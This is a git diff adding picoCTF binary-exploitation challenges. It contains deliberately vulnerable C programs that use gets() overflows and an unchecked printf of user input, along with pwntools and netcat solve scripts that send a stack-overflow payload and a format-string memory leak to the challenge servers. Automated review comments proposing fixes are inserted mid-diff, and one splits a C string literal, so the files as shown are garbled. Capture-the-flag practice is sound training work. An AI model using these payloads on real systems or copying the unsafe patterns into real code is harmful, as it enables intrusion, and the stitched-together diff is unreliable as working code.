diff --git a/pwn/basic_file_exploit/netcat.log b/pwn/basic_file_exploit/netcat.log
new file mode 100644
index 0000000..9fd7e40
--- /dev/null
+++ b/pwn/basic_file_exploit/netcat.log
@@ -0,0 +1,21 @@
+$ nc saturn.picoctf.net 51109
+Hi, welcome to my echo chamber!
+Type '1' to enter a phrase into our database
+Type '2' to echo a phrase in our database
+Type '3' to exit the program
+1
+1
+Please enter your data:
+asdf
+asdf
+Please enter the length of your data:
+4
+4
+Your entry number is: 1
+Write successful, would you like to do anything else?
+2
+2
+Please enter the entry number of your data:
+0
+0
+picoCTF{M4K3_5UR3_70_CH3CK_Y0UR_1NPU75_E0394EC0}
diff --git a/pwn/basic_file_exploit/program-redacted.c b/pwn/basic_file_exploit/program-redacted.c
new file mode 100644
index 0000000..ad40974
--- /dev/null
+++ b/pwn/basic_file_exploit/program-redacted.c
@@ -0,0 +1,195 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+#define WAIT 60
+
+
+static const char* flag = "[REDACTED]";
+
+static char data[10][100];
+static int input_lengths[10];
+static int inputs = 0;
+
+
+
+int tgetinput(char *input, unsigned int l)
+{
+ fd_set input_set;
+ struct timeval timeout;
+ int ready_for_reading = 0;
+ int read_bytes = 0;
+
+ if( l <= 0 )
+ {
+ printf("'l' for tgetinput must be greater than 0\n");
+ return -2;
+ }
+
+
+ /* Empty the FD Set */
+ FD_ZERO(&input_set );
+ /* Listen to the input descriptor */
+ FD_SET(STDIN_FILENO, &input_set);
+
+ /* Waiting for some seconds */
+ timeout.tv_sec = WAIT; // WAIT seconds
+ timeout.tv_usec = 0; // 0 milliseconds
+
+ /* Listening for input stream for any activity */
+ ready_for_reading = select(1, &input_set, NULL, NULL, &timeout);
+ /* Here, first parameter is number of FDs in the set,
+ * second is our FD set for reading,
+ * third is the FD set in which any write activity needs to updated,
+ * which is not required in this case.
+ * Fourth is timeout
+ */
+
+ if (ready_for_reading == -1) {
+ /* Some error has occured in input */
+ printf("Unable to read your input\n");
+ return -1;
+ }
+
+ if (ready_for_reading) {
+ read_bytes = read(0, input, l-1);
+ if(input[read_bytes-1]=='\n'){
+ --read_bytes;
+ input[read_bytes]='\0';
+ }
+ if(read_bytes==0){
+ printf("No data given.\n");
+ return -4;
+ } else {
+ return 0;
+ }
+ } else {
+ printf("Timed out waiting for user input. 
Press Ctrl-C to disconnect\n");
+ return -3;
+ }
+
+ return 0;
+}
+
+
+static void data_write() {
+ char input[100];
+ char len[4];
+ long length;
+ int r;
+
+ printf("Please enter your data:\n");
+ r = tgetinput(input, 100);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ while (true) {
+ printf("Please enter the length of your data:\n");
+ r = tgetinput(len, 4);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ if ((length = strtol(len, NULL, 10)) == 0) {
+ puts("Please put in a valid length");
+ } else {
+ break;
+ }
+ }
+
+ if (inputs > 10) {
+ inputs = 0;
+ }
+
+ strcpy(data[inputs], input);
+ input_lengths[inputs] = length;
+
+ printf("Your entry number is: %d\n", inputs + 1);
+ inputs++;
+}
+
+
+static void data_read() {
+ char entry[4];
+ long entry_number;
+ char output[100];
+ int r;
+
+ memset(output, '\0', 100);
+
+ printf("Please enter the entry number of your data:\n");
+ r = tgetinput(entry, 4);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ if ((entry_number = strtol(entry, NULL, 10)) == 0) {
+ puts(flag);
+ fseek(stdin, 0, SEEK_END);
+ exit(0);
+ }
+
+ entry_number--;
+ strncpy(output, data[entry_number], input_lengths[entry_number]);
+ puts(output);
+}
+
+
+int main(int argc, char** argv) {
+ char input[3] = {'\0'};
+ long command;
+ int r;
+
+ puts("Hi, welcome to my echo chamber!");
+ puts("Type '1' to enter a phrase into our database");
+ puts("Type '2' to echo a phrase in our database");
+ puts("Type '3' to exit the program");
+
+ while (true) {
+ r = tgetinput(input, 3);
+ // Timeout on user input
+ if(r == -3)
+ {
+ printf("Goodbye!\n");
+ exit(0);
+ }
+
+ if ((command = strtol(input, NULL, 10)) == 0) {
+ puts("Please put in a valid number");
+ } else if (command == 1) {
+ data_write();
+ puts("Write successful, would you like to do anything else?");
+ } else if (command == 2) {
+ if (inputs == 0) {
+ puts("No data yet");
+
continue;
+ }
+ data_read();
+ puts("Read successful, would you like to do anything else?");
+ } else if (command == 3) {
+ return 0;
+ } else {
+ puts("Please type either 1, 2 or 3");
+ puts("Maybe breaking boundaries elsewhere will be helpful");
+ }
+ }
+
+ return 0;
+}
diff --git a/pwn/buffer_overflow_0/flag.txt b/pwn/buffer_overflow_0/flag.txt
new file mode 100644
index 0000000..4944a4b
--- /dev/null
+++ b/pwn/buffer_overflow_0/flag.txt
@@ -0,0 +1 @@
+flag{FAKEFLAG}
diff --git a/pwn/buffer_overflow_0/solve.sh b/pwn/buffer_overflow_0/solve.sh
new file mode 100755
index 0000000..defe7bf
--- /dev/null
+++ b/pwn/buffer_overflow_0/solve.sh
@@ -0,0 +1,3 @@
+#!/usr/bin/env bash
+
+echo "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" | nc saturn.picoctf.net 65443
diff --git a/pwn/buffer_overflow_0/vuln b/pwn/buffer_overflow_0/vuln
new file mode 100755
index 0000000..e4e63e1
Binary files /dev/null and b/pwn/buffer_overflow_0/vuln differ
diff --git a/pwn/buffer_overflow_0/vuln.c b/pwn/buffer_overflow_0/vuln.c
new file mode 100644
index 0000000..ddeb1b5
--- /dev/null
+++ b/pwn/buffer_overflow_0/vuln.c
@@ -0,0 +1,44 @@
+#include
+#include
+#include
+#include
+
+#define FLAGSIZE_MAX 64
+
+char flag[FLAGSIZE_MAX];
+
+void sigsegv_handler(int sig) {
+ printf("%s\n", flag);
+ fflush(stdout);
+ exit(1);
+}
+
+void vuln(char *input){
+ char buf2[16];
+ strcpy(buf2, input);
+}
+
+int main(int argc, char **argv){
+
+ FILE *f = fopen("flag.txt","r");
+ if (f == NULL) {
+ printf("%s %s", "Please create 'flag.txt' in this directory with your",
+ "own debugging flag.\n");
+ exit(0);
+ }
+
+ fgets(flag,FLAGSIZE_MAX,f);
+ signal(SIGSEGV, sigsegv_handler); // Set up signal handler
+
+ gid_t gid = getegid();
+ setresgid(gid, gid, gid);
+
+
+ printf("Input: ");
+ fflush(stdout);
+ char buf1[100];
+ gets(buf1);
+ vuln(buf1);
+ printf("The program will exit now\n");
+ return 0;
+}
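Review bot: The wrap guard in data_write, `if (inputs > 10)`, lets `inputs == 10` fall through, so `strcpy(data[inputs], input)` and `input_lengths[inputs] = length` each write one element past their 10-element arrays; it should read `if (inputs >= 10) {`. data_read has the matching gap on the read side: `entry_number` is decremented and used as an index with no check that it lies in `[0, inputs)`, and `input_lengths[entry_number]` is the user-typed count rather than the stored string's length, so `strncpy` can read beyond the entry and leave `output` unterminated. Earlier in the same file, tgetinput tests `input[read_bytes-1]` before checking whether `read()` returned 0 or -1, which indexes `input[-1]` on EOF. A guard before the decrement such as `if (entry_number < 1 || entry_number > inputs) { puts("No such entry"); return; }` plus a copy length capped at `sizeof output - 1` would close the read side.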
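Review bot: sigsegv_handler calls `printf`, `fflush` and `exit`, none of which is async-signal-safe, so the handler can deadlock or corrupt stdio state if the fault is raised while stdio holds its lock; `write(STDOUT_FILENO, flag, strlen(flag));` followed by `_exit(1);` is the safe shape. In main the `fgets` result is unchecked and the `FILE *f` is never closed, so an empty flag.txt silently leaves `flag` blank and the descriptor leaks until exit. The `gets`/unbounded-`strcpy` pair in main and vuln is evidently the exercise itself; a comment such as `/* intentionally unsafe: this is the overflow target */` would make that explicit for readers, and since `gets` was removed in C11 the build needs a pre-C11 mode or a libc that still declares it.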
diff --git a/pwn/clutter_overflow/chall b/pwn/clutter_overflow/chall
new file mode 100755
index 0000000..c37dc1d
Binary files /dev/null and b/pwn/clutter_overflow/chall differ
diff --git a/pwn/clutter_overflow/chall.c b/pwn/clutter_overflow/chall.c
new file mode 100644
index 0000000..a5c070f
--- /dev/null
+++ b/pwn/clutter_overflow/chall.c
@@ -0,0 +1,54 @@ +#include +#include + +#define SIZE 0x100 +#define GOAL 0xdeadbeef + +const char* HEADER = +" ______________________________________________________________________\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |\n" +"|^ ^ ^ ^ ^ ^ |L L L L|^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ==================^ ^ ^|\n" +"| ^ ^ ^ ^ ^ ^| L L L | ^ ^ ^ ^ ^ ^ ___ ^ ^ ^ ^ / \\^ ^ |\n" +"|^ ^_^ ^ ^ ^ =========^ ^ ^ ^ _ ^ / \\ ^ _ ^ / | | \\^ ^|\n" +"| ^/_\\^ ^ ^ /_________\\^ ^ ^ /_\\ | // | /_\\ ^| | ____ ____ | | ^ |\n" +"|^ =|= ^ =================^ ^=|=^| |^=|=^ | | {____}{____} | |^ ^|\n" +"| ^ ^ ^ ^ | ========= |^ ^ ^ ^ ^\\___/^ ^ ^ ^| |__%%%%%%%%%%%%__| | ^ |\n" +"|^ ^ ^ ^ ^| / ( \\ | ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ |/ %%%%%%%%%%%%%% \\|^ ^|\n" +".-----. ^ || ) ||^ ^.-------.-------.^| %%%%%%%%%%%%%%%% | ^ |\n" +"| |^ ^|| o ) ( o || ^ | | | | /||||||||||||||||\\ |^ ^|\n" +"| ___ | ^ || | ( )) | ||^ ^| ______|_______|^| |||||||||||||||lc| | ^ |\n" +"|'.____'_^||/!\\@@@@@/!\\|| _'______________.'|== =====\n" +"|\\|______|===============|________________|/|\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\" ||\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"||\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" \n" +"\"\"''\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"''\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n" +"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""; + +int main(void) +{ + long code = 0; + char clutter[SIZE]; + + setbuf(stdout, NULL); + setbuf(stdin, NULL); + setbuf(stderr, NULL); + + puts(HEADER); + puts("My room is so cluttered..."); + 
puts("What do you see?");
+
+ gets(clutter);
+
+
+ if (code == GOAL) {
+ printf("code == 0x%llx: how did that happen??\n", GOAL);
+ puts("take a flag for your troubles");
+ system("cat flag.txt");
+ } else {
+ printf("code == 0x%llx\n", code);
+ printf("code != 0x%llx :(\n", GOAL);
+ }
+
+ return 0;
+}
diff --git a/pwn/clutter_overflow/flag.txt b/pwn/clutter_overflow/flag.txt
new file mode 100644
index 0000000..4944a4b
--- /dev/null
+++ b/pwn/clutter_overflow/flag.txt
@@ -0,0 +1 @@
+flag{FAKEFLAG}
diff --git a/pwn/clutter_overflow/solve.py b/pwn/clutter_overflow/solve.py
new file mode 100755
index 0000000..2a489b4
--- /dev/null
+++ b/pwn/clutter_overflow/solve.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.pwntools
+
+from pwn import *
+
+exe = ELF("chall")
+
+context.binary = exe
+
+
+def conn():
+ if args.LOCAL:
+ r = process([exe.path])
+ if args.DEBUG:
+ gdb.attach(r)
+ else:
+ r = remote("mars.picoctf.net", 31890)
+
+ return r
+
+
+def main():
+ r = conn()
+ # gdb.attach(r, 'break *main+143')
+ print(r.recvuntil(b'What do you see?\n'))
+ r.sendline((b'A' * 264) + p64(0xdeadbeef))
+ print(r.recvall().decode())
+
+
+if __name__ == "__main__":
+ main()
diff --git a/pwn/cve_xxxx_xxxx/flag.txt b/pwn/cve_xxxx_xxxx/flag.txt
new file mode 100644
index 0000000..c8eaedd
--- /dev/null
+++ b/pwn/cve_xxxx_xxxx/flag.txt
@@ -0,0 +1 @@
+CVE-2021-34527
diff --git a/pwn/stonks/solve.py b/pwn/stonks/solve.py
new file mode 100755
index 0000000..b3312e5
--- /dev/null
+++ b/pwn/stonks/solve.py
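Review bot: All three `printf` calls in the `if`/`else` at the end of main use `%llx`, but `code` is a `long` and `GOAL` expands to the `unsigned int` constant `0xdeadbeef`, so the conversion matches neither argument and the printed values rely on undefined behaviour (`-Wformat` flags this on GCC/Clang). Either use the matching conversions — `printf("code == 0x%lx\n", code);` and `printf("code != 0x%x :(\n", GOAL);` — or define `GOAL` as `0xdeadbeefUL` and print both with `%lx`. `gets(clutter)` is the overflow the exercise is built around; a one-line comment marking it as deliberate would help readers, since `gets` is no longer declared in C11 and the file will not build in that mode.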
@@ -0,0 +1,43 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3 python3Packages.pwntools
+
+from pwn import *
+
+ADDR = "mercury.picoctf.net 59616"
+HOST, PORT = ADDR.split(" ")
+
+def main():
+ for x in range(1,2):
+ r = remote(HOST, PORT)
+ r.recvline()
+ r.recvline()
+ r.recvline()
+ r.recvline()
+ r.recvline()
+ r.sendline(b'1')
+ r.recvline()
+ r.recvline()
+ r.recvline()
+
+ # r.sendline(f'%{x}$s'.encode())
+ # print(f'%{x}$s'.encode())
+ r.sendline(b"%x." * 99 + b"%x")
+ r.recvline()
+ result = r.recvline()
+ print(result)
+ unpacked = []
+ for x in result.strip().split(b"."):
+ x = int(x, 16)
+ print(x)
+ unpacked.extend([
+ (x & 0x000000FF),
+ (x & 0x0000FF00) >> 8,
+ (x & 0x00FF0000) >> 16,
+ (x & 0xFF000000) >> 24,
+ ])
+ for x in unpacked:
+ if x >= ord('!') and x <= ord('~'):
+ print(chr(x), end='')
+
+if __name__ == "__main__":
+ main()
diff --git a/pwn/stonks/vuln.c b/pwn/stonks/vuln.c
new file mode 100644
index 0000000..5b385a2
--- /dev/null
+++ b/pwn/stonks/vuln.c
@@ -0,0 +1,148 @@
+#include
+#include
+#include
+#include
+
+#define FLAG_BUFFER 128
+#define MAX_SYM_LEN 4
+
+typedef struct Stonks {
+ int shares;
+ char symbol[MAX_SYM_LEN + 1];
+ struct Stonks *next;
+} Stonk;
+
+typedef struct Portfolios {
+ int money;
+ Stonk *head;
+} Portfolio;
+
+int view_portfolio(Portfolio *p) {
+ if (!p) {
+ return 1;
+ }
+ printf("\nPortfolio as of ");
+ fflush(stdout);
+ system("date"); // TODO: implement this in C
+ fflush(stdout);
+
+ printf("\n\n");
+ Stonk *head = p->head;
+ if (!head) {
+ printf("You don't own any stonks!\n");
+ }
+ while (head) {
+ printf("%d shares of %s\n", head->shares, head->symbol);
+ head = head->next;
+ }
+ return 0;
+}
+
+Stonk *pick_symbol_with_AI(int shares) {
+ if (shares < 1) {
+ return NULL;
+ }
+ Stonk *stonk = malloc(sizeof(Stonk));
+ stonk->shares = shares;
+
+ int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1;
+ for (int i = 0; i <= MAX_SYM_LEN; i++) {
+ if (i < AI_symbol_len) {
+ stonk->symbol[i] = 'A' + (rand() % 26);
+ } else {
+ stonk->symbol[i] = '\0';
+ }
+ }
+
+ stonk->next = NULL;
+
+ return stonk;
+}
+
+int buy_stonks(Portfolio *p) {
+ if (!p) {
+ return 1;
+ }
+ char api_buf[FLAG_BUFFER];
+ FILE *f = fopen("api","r");
+ if (!f) {
+ printf("Flag file not found. 
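Review bot: The loop variable `x` of `for x in range(1,2)` is rebound by both inner loops (`for x in result.strip().split(b".")` and `for x in unpacked`), so the commented-out `f'%{x}$s'` line would no longer see the outer counter if the range were widened; give the inner loops their own names, e.g. `for word in result.strip().split(b"."):` and `for byte in unpacked:`, or drop the single-iteration outer loop. `PORT` is a `str` after `ADDR.split(" ")`; pwntools may coerce it, but `remote(HOST, int(PORT))` makes the intent explicit. The tube is never closed, so an `r.close()` after the final print loop would avoid leaving the connection open until interpreter exit. The 4-byte little-endian unpacking assumes a 32-bit target; a one-line comment stating that assumption would help the next reader.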
Contact an admin.\n");
+ exit(1);
+ }
+ fgets(api_buf, FLAG_BUFFER, f);
+
+ int money = p->money;
+ int shares = 0;
+ Stonk *temp = NULL;
+ printf("Using patented AI algorithms to buy stonks\n");
+ while (money > 0) {
+ shares = (rand() % money) + 1;
+ temp = pick_symbol_with_AI(shares);
+ temp->next = p->head;
+ p->head = temp;
+ money -= shares;
+ }
+ printf("Stonks chosen\n");
+
+ // TODO: Figure out how to read token from file, for now just ask
+
+ char *user_buf = malloc(300 + 1);
+ printf("What is your API token?\n");
+ scanf("%300s", user_buf);
+ printf("Buying stonks with token:\n");
+ printf(user_buf);
+
+ // TODO: Actually use key to interact with API
+
+ view_portfolio(p);
+
+ return 0;
+}
+
+Portfolio *initialize_portfolio() {
+ Portfolio *p = malloc(sizeof(Portfolio));
+ p->money = (rand() % 2018) + 1;
+ p->head = NULL;
+ return p;
+}
+
+void free_portfolio(Portfolio *p) {
+ Stonk *current = p->head;
+ Stonk *next = NULL;
+ while (current) {
+ next = current->next;
+ free(current);
+ current = next;
+ }
+ free(p);
+}
+
+int main(int argc, char *argv[])
+{
+ setbuf(stdout, NULL);
+ srand(time(NULL));
+ Portfolio *p = initialize_portfolio();
+ if (!p) {
+ printf("Memory failure\n");
+ exit(1);
+ }
+
+ int resp = 0;
+
+ printf("Welcome back to the trading app!\n\n");
+ printf("What would you like to do?\n");
+ printf("1) Buy some stonks!\n");
+ printf("2) View my portfolio\n");
+ scanf("%d", &resp);
+
+ if (resp == 1) {
+ buy_stonks(p);
+ } else if (resp == 2) {
+ view_portfolio(p);
+ }
+
+ free_portfolio(p);
+ printf("Goodbye!\n");
+
+ exit(0);
+}
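Review bot: `printf(user_buf);` in buy_stonks passes user-controlled input as the format string (CERT FIO30-C); the fix is `printf("%s\n", user_buf);`. The `FILE *f` opened on `api` is never closed and the `fgets` into `api_buf` is unchecked, so an empty file leaves `api_buf` uninitialised and the descriptor leaks for the rest of the run. The `malloc` results in pick_symbol_with_AI and initialize_portfolio are dereferenced without a NULL check — the `if (!p)` in main only runs after `p->money` has already been written — and `user_buf` is never freed. `system("date")` in view_portfolio resolves `date` through the inherited `PATH`; `strftime` over `localtime` would remove the shell dependency the adjacent TODO already flags.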